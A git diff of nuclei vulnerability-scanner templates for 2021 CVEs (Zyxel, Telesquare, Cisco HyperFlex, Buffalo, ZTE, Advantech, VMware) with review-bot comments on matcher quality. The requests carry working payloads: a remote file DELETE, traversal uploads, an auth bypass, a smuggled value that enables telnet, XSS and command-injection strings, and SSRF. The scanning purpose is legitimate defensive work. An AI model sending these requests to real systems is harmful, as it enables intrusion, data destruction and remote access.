a/nuclei-templates/CVE-2021/CVE-2021-46387.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-46387 - -info: - name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting - author: DhiyaneshDk - severity: medium - description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks. - reference: - - https://www.exploit-db.com/exploits/50797 - - https://www.zyxel.com/us/en/support/security_advisories.shtml - - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2021-46387 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-46387 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"Zywall2Plus" - tags: cve,cve2021,xss,zyxel,edb - -requests: - - method: GET - path: - - '{{BaseURL}}/Forms/rpAuth_1?id=
' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Entry Error' - condition: and - - - type: word - part: header - words: - - 'text/html' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-46424.yaml b/nuclei-templates/CVE-2021/CVE-2021-46424.yaml deleted file mode 100644 index 68a13f74a8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-46424.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-46424 -info: - name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete - author: gy741 - severity: critical - description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. - reference: - - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt - - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing - - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-46424 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2021-46424 - cwe-id: CWE-306 - metadata: - shodan-query: http.html:"TLR-2005KSH" - verified: "true" - tags: cve,cve2021,telesquare,intrusive -requests: - - raw: - - | - GET /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - - | - DELETE /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - - | - GET /images/icons_title.gif HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/cve-2021-1499.yaml b/nuclei-templates/CVE-2021/cve-2021-1499.yaml new file mode 100644 index 0000000000..02678b971d --- /dev/null 
+++ b/nuclei-templates/CVE-2021/cve-2021-1499.yaml 
@@ -0,0 +1,55 @@ +id: CVE-2021-1499 + +info: + name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability + author: gy741 + severity: medium + description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. + reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz + - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2021-1499 + cwe-id: CWE-306 + tags: cve,cve2021,cisco,fileupload,intrusive + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 + Origin: {{RootURL}} + Referer: {{RootURL}} + + -----------------------------253855577425106594691130420583 + Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" + Content-Type: application/json + + MyPasswdNewData->/api/tomcat + + -----------------------------253855577425106594691130420583-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - '{"result":' + - '"filename:' + - '/tmp/passwd9' + 
condition: and diff --git a/nuclei-templates/CVE-2021/cve-2021-20031.yaml b/nuclei-templates/CVE-2021/cve-2021-20031.yaml new file mode 100644 index 0000000000..57d975870e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-20031.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-20031 + +info: + name: Sonicwall SonicOS 7.0 - Host Header Injection + author: gy741 + severity: medium + description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + reference: + - https://www.exploit-db.com/exploits/50414 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019 + - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20031 + cwe-id: CWE-601 + metadata: + google-dork: inurl:"auth.html" intitle:"SonicWall" + tags: cve,cve2021,sonicwall,redirect + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + - type: word + words: + - 'https://{{randstr}}.tld/auth.html' + - 'Please be patient as you are being re-directed' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-20090.yaml b/nuclei-templates/CVE-2021/cve-2021-20090.yaml new file mode 100644 index 0000000000..2e2a5ad591 
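Review bot: In cve-2021-20031.yaml the `description` stops mid-sentence ("…during various other attack") and talks about Sonicwall NAS and SonicWall Analyzer 8.5.0, while `name` says SonicOS 7.0, so a finding generated from this template does not tell the reader which product was tested. The matcher only shows that the request's Host value is reflected into the `auth.html` link of the redirect page, and the description should say that, for example `description: SonicWall SonicOS 7.0 reflects the request's Host header into the links of its redirect page, so a spoofed Host value controls where those links point.` The rest of the current text belongs in the referenced advisories.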
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-20090.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-20090
+
+info:
+ name: Buffalo WSR-2533DHPL2 - Path Traversal
+ author: gy741
+ severity: critical
+ description: |
+ Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
+ reference:
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-20090
+ cwe-id: CWE-22
+ tags: cve,cve2021,lfi,buffalo,firmware,iot
+
+requests:
+ - raw:
+ - |
+ GET /images/..%2finfo.html HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}/info.html
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'URLToken(cgi_path)'
+ - 'pppoe'
+ - 'wan'
+ condition: and
+
+# Enhanced by mp on 2022/05/05
diff --git a/nuclei-templates/CVE-2021/cve-2021-20091.yaml b/nuclei-templates/CVE-2021/cve-2021-20091.yaml
new file mode 100644
index 0000000000..543362500a
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-20091.yaml
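Review bot: A 200 from `/images/..%2finfo.html` is reported as an authentication bypass without showing that `/info.html` is refused when requested directly, so a device that serves the page to this client anyway (presumably possible if the scanner's address already holds a session) is flagged as well. A control request ahead of the traversal request, compared under `req-condition: true`, ties the finding to the traversal itself. With `req-condition` the existing word matcher should then name `part: body_2`. The words `pppoe` and `wan` are short enough to add little, and `URLToken(cgi_path)` carries the match.

```yaml
requests:
  - raw:
      - | # control: the same page requested directly
        GET /info.html HTTP/1.1
        Host: {{Hostname}}

      # … unchanged: GET /images/..%2finfo.html request …

    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 != 200 && status_code_2 == 200'

      # … unchanged: word matcher, now with part: body_2 …
```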
@@ -0,0 +1,53 @@
+id: CVE-2021-20091
+
+info:
+ name: Buffalo WSR-2533DHPL2 - Configuration File Injection
+ author: gy741,pdteam,parth
+ severity: high
+ description: |
+ The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
+ reference:
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-20091
+ tags: cve,cve2021,buffalo,firmware,iot
+
+requests:
+ - raw:
+ - |
+ GET /images/..%2finfo.html HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}/info.html
+
+ - |
+ POST /images/..%2fapply_abstract.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}/info.html
+ Content-Type: application/x-www-form-urlencoded
+
+ action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "/Success.htm"
+
+ - type: status
+ status:
+ - 302
+
+ extractors:
+ - type: regex
+ name: httoken
+ internal: true
+ group: 1
+ regex:
+ - 'base64\,(.*?)" border='
+
+# Enhanced by mp on 2022/04/12
diff --git a/nuclei-templates/CVE-2021/cve-2021-20092.yaml b/nuclei-templates/CVE-2021/cve-2021-20092.yaml
new file mode 100644
index 0000000000..7a029962c1
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-20092.yaml
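Review bot: The POST body carries `ARC_SYS_TelnetdEnable=1`, so a positive result changes the router's configuration and, as far as the template shows, leaves it changed, yet `tags` has no `intrusive` marker and scans that exclude intrusive templates will still run it. `tags: cve,cve2021,buffalo,firmware,iot,intrusive` fixes the selection problem, and a comment on the POST stating that the setting has to be reverted after a hit documents the side effect. The matchers (`/Success.htm` in the header plus status 302) only show that the CGI accepted the form, which the description should state. `classification` also lacks a `cwe-id`, unlike the sibling templates for CVE-2021-20090 and CVE-2021-20092.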
@@ -0,0 +1,58 @@
+id: CVE-2021-20092
+
+info:
+ name: Buffalo WSR-2533DHPL2 - Improper Access Control
+ author: gy741,pdteam,parth
+ severity: high
+ description: |
+ The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
+ reference:
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-20092
+ cwe-id: CWE-200
+ tags: cve,cve2021,buffalo,firmware,iot
+
+requests:
+ - raw:
+ - |
+ GET /images/..%2finfo.html HTTP/1.1
+ Host: {{Hostname}}
+ Referer: {{BaseURL}}/info.html
+
+ - |
+ GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: lang=8; url=ping.html; mobile=false;
+ Referer: {{BaseURL}}/info.html
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "application/x-javascript"
+ - type: word
+ words:
+ - "/*DEMO*/"
+ - "addCfg("
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: httoken
+ internal: true
+ group: 1
+ regex:
+ - 'base64\,(.*?)" border='
+
+# Enhanced by mp on 2022/04/12
diff --git a/nuclei-templates/CVE-2021/cve-2021-20792.yaml b/nuclei-templates/CVE-2021/cve-2021-20792.yaml
new file mode 100644
index 0000000000..8430ef6363
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-20792.yaml
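Review bot: The third `reference` entry points to `https://nvd.nist.gov/vuln/detail/CVE-2021-20091`, while `id` and `cve-id` are CVE-2021-20092; it looks copied from the sibling template and should read `- https://nvd.nist.gov/vuln/detail/CVE-2021-20092`. The second request also sends `Content-Type: application/x-www-form-urlencoded` on a GET with no body, which can be dropped. The `httoken` extractor and the `trimprefix(base64_decode(...))` expression are duplicated from cve-2021-20091.yaml without explanation; a one-line comment on the extractor saying which element of info.html the token is read from would make both templates maintainable.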
@@ -0,0 +1,50 @@
+id: CVE-2021-20792
+
+info:
+ name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
+ reference:
+ - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
+ - https://quizandsurveymaster.com/
+ - https://jvn.jp/en/jp/JVN65388002/index.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-20792
+ cwe-id: CWE-79
+ tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=mlw_quiz_list&s=">&paged="> HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/nuclei-templates/CVE-2021/cve-2021-21745.yaml b/nuclei-templates/CVE-2021/cve-2021-21745.yaml
new file mode 100644
index 0000000000..867df640ad
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21745.yaml
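Review bot: `tags` is `wordpress,cve,cve2021,wp-plugin,authenticated` with no `xss`, so tag-filtered XSS runs skip this template even though `name` and `cwe-id: CWE-79` classify it as reflected XSS; `tags: wordpress,cve,cve2021,wp-plugin,xss,authenticated` fixes that. `description` ends with a stray `"`. As the hunk reads here the body matcher's only word is an empty string, which would match any body; if that is not an artefact of how this page was rendered, the matcher needs the reflected marker together with a string that only the plugin's quiz list page contains. Nothing checks that the login in the first request succeeded, so a failed login plus any 200 HTML page could satisfy the remaining matchers.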
@@ -0,0 +1,39 @@
+id: CVE-2021-21745
+
+info:
+ name: ZTE MF971R - Referer authentication bypass
+ author: gy741
+ severity: medium
+ description: |
+ ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould
+ use this vulnerability to perform illegal authorization operations by sending a request to the user to click.
+ reference:
+ - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21745
+ - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2021-21745
+ cwe-id: CWE-287
+ tags: zte,auth-bypass,cve,cve2021,router
+
+requests:
+ - raw:
+ - |
+ GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
+ Host: {{Hostname}}
+ Referer: http://interact.sh/127.0.0.1.html
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ part: body
+ regex:
+ - 'psw_fail_num_str":"[0-9]'
+
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/05/21
diff --git a/nuclei-templates/CVE-2021/cve-2021-21799.yaml b/nuclei-templates/CVE-2021/cve-2021-21799.yaml
new file mode 100644
index 0000000000..3c93d2ef05
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21799.yaml
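Review bot: There is no control request without the crafted `Referer`, so the template cannot tell a device where the header changes the answer from one that returns `psw_fail_num_str` to every client; a second request without the header, compared under `req-condition: true`, would close that gap. The `Referer` value also hard-codes the third-party host `interact.sh` with no comment saying which part of the value the check depends on; a short comment on that line would let a maintainer replace the host safely. The description has the typo `attackercould` and describes a CSRF-style issue while `cwe-id` is CWE-287, which is worth reconciling with the NVD entry.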
@@ -0,0 +1,43 @@
+id: CVE-2021-21799
+
+info:
+ name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-21799
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.html:"R-SeeNet"
+ verified: "true"
+ tags: cve,cve2021,xss,r-seenet
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Telnet "
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/cve-2021-21801.yaml
new file mode 100644
index 0000000000..970f374b80
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21801.yaml
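Review bot: `tags` spells the product `r-seenet` here, while cve-2021-21801.yaml and cve-2021-21802.yaml, added in the same commit for the same product, use `rseenet`, so a run filtered on either tag covers only part of the R-SeeNet templates. One spelling should be used in all three. As the hunk reads here the body word is just `Telnet `, which any rendering of telnet_form.php would contain; if that is not a rendering artefact, the matcher should require the reflected marker itself.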
@@ -0,0 +1,39 @@
+id: CVE-2021-21801
+
+info:
+ name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
+ arbitrary JavaScript code execution.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-21801
+ cwe-id: CWE-79
+ tags: cve,cve2021,rseenet,xss,graph
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-21802.yaml b/nuclei-templates/CVE-2021/cve-2021-21802.yaml
new file mode 100644
index 0000000000..df8b1fca2a
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21802.yaml
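Review bot: `description` is word for word the same as in cve-2021-21802.yaml and never names the `graph` parameter this template's path exercises, so the two findings cannot be told apart in a report. A description that states what the matcher verifies would fix that, for example `description: Advantech R-SeeNet reflects the graph parameter of device_graph_page.php into the page without escaping.`, with `device_id` in the sibling. Both templates cite only TALOS-2021-1272 and neither links the NVD entry; confirm the advisory number for each CVE and add `- https://nvd.nist.gov/vuln/detail/CVE-2021-21801` here. `graph` in `tags` is a parameter name rather than a product or vulnerability class and can be dropped.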
@@ -0,0 +1,39 @@
+id: CVE-2021-21802
+
+info:
+ name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
+ arbitrary JavaScript code execution.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-21802
+ cwe-id: CWE-79
+ tags: cve,cve2021,rseenet,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-21805.yaml b/nuclei-templates/CVE-2021/cve-2021-21805.yaml
deleted file mode 100644
index 7c6b7bea06..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-21805.yaml
+++ /dev/null
@@ -1,46 +0,0 @@ -id: CVE-2021-21805 - -info: - name: Advantech R-SeeNet 2.4.12 - OS Command Injection - author: arafatansari - severity: critical - description: | - Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21805 - cwe-id: CWE-78 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,rce,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/ping.php?hostname=|dir" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ping |dir" - - "bottom.php" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/cve-2021-21816.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21816.yaml rename to nuclei-templates/CVE-2021/cve-2021-21816.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21973.yaml b/nuclei-templates/CVE-2021/cve-2021-21973.yaml new file mode 100644 index 0000000000..ca41de8384 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21973.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2021-21973
+
+info:
+ name: VMware vCenter Unauthenticated SSRF
+ author: pdteam
+ severity: medium
+ description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21973
+ - https://twitter.com/osama_hroot/status/1365586206982082560
+ - https://twitter.com/bytehx343/status/1486582542807420928
+ - https://www.vmware.com/security/advisories/VMSA-2021-0002.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-21973
+ cwe-id: CWE-918
+ tags: cve,cve2021,vmware,ssrf,vcenter,oast
+
+requests:
+ - raw:
+ - |
+ GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
+ Host: {{Hostname}}
+ Vcip: {{interactsh-url}}
+ Vcpassword: {{rand_base(6)}}
+ Vcusername: {{rand_base(6)}}
+ Reqresource: {{rand_base(6)}}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ part: body
+ words:
+ - "The server sent HTTP status code 200"
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2021/cve-2021-21985.yaml b/nuclei-templates/CVE-2021/cve-2021-21985.yaml
new file mode 100644
index 0000000000..303389b8c8
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21985.yaml
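Review bot: The template is tagged `oast` and puts `{{interactsh-url}}` in the `Vcip` header, but no matcher reads the interaction; the verdict rests on a 500 status and the body text `The server sent HTTP status code 200`, which depends on how the callback server happens to answer and on the error wording staying the same. Adding a third matcher, `- {type: word, part: interactsh_protocol, words: ["http"]}`, confirms that the server actually made the outbound request. The description says the issue is reached with a POST while the request here is a GET; a comment noting the difference would save the next reader a lookup.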
@@ -0,0 +1,36 @@
+id: CVE-2021-21985
+
+info:
+ name: VMware vSphere Client (HTML5) - Remote Code Execution
+ author: D0rkerDevil
+ severity: critical
+ description: |
+ The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
+ reference:
+ - https://www.vmware.com/security/advisories/VMSA-2021-0010.html
+ - https://github.com/alt3kx/CVE-2021-21985_PoC
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21985
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-21985
+ cwe-id: CWE-20
+ tags: cve,cve2021,rce,vsphere,vmware
+
+requests:
+ - raw:
+ - |
+ POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/json
+
+ {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
+
+ matchers:
+ - type: word
+ words:
+ - '{"result":{"isDisconnected":'
+ part: body
+
+# Enhanced by mp on 2022/05/05
diff --git a/nuclei-templates/CVE-2021/cve-2021-22502.yaml b/nuclei-templates/CVE-2021/cve-2021-22502.yaml
new file mode 100644
index 0000000000..0c1d4eb176
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-22502.yaml
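Review bot: The only matcher is the body word `{"result":{"isDisconnected":`, with no status check, and what it establishes is that the `getClusterCapabilityData` proxy method answers an unauthenticated POST, not that anything was executed. That is a sensible non-destructive indicator, but the template should say so, because the name and the `rce` tag suggest a confirmed execution: a comment above `matchers:` such as `# Detects the unauthenticated h5-vsan proxy endpoint only; no command is run` would do. Adding a status matcher for 200 under `matchers-condition: and` would also stop an error page that echoes the string from matching.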
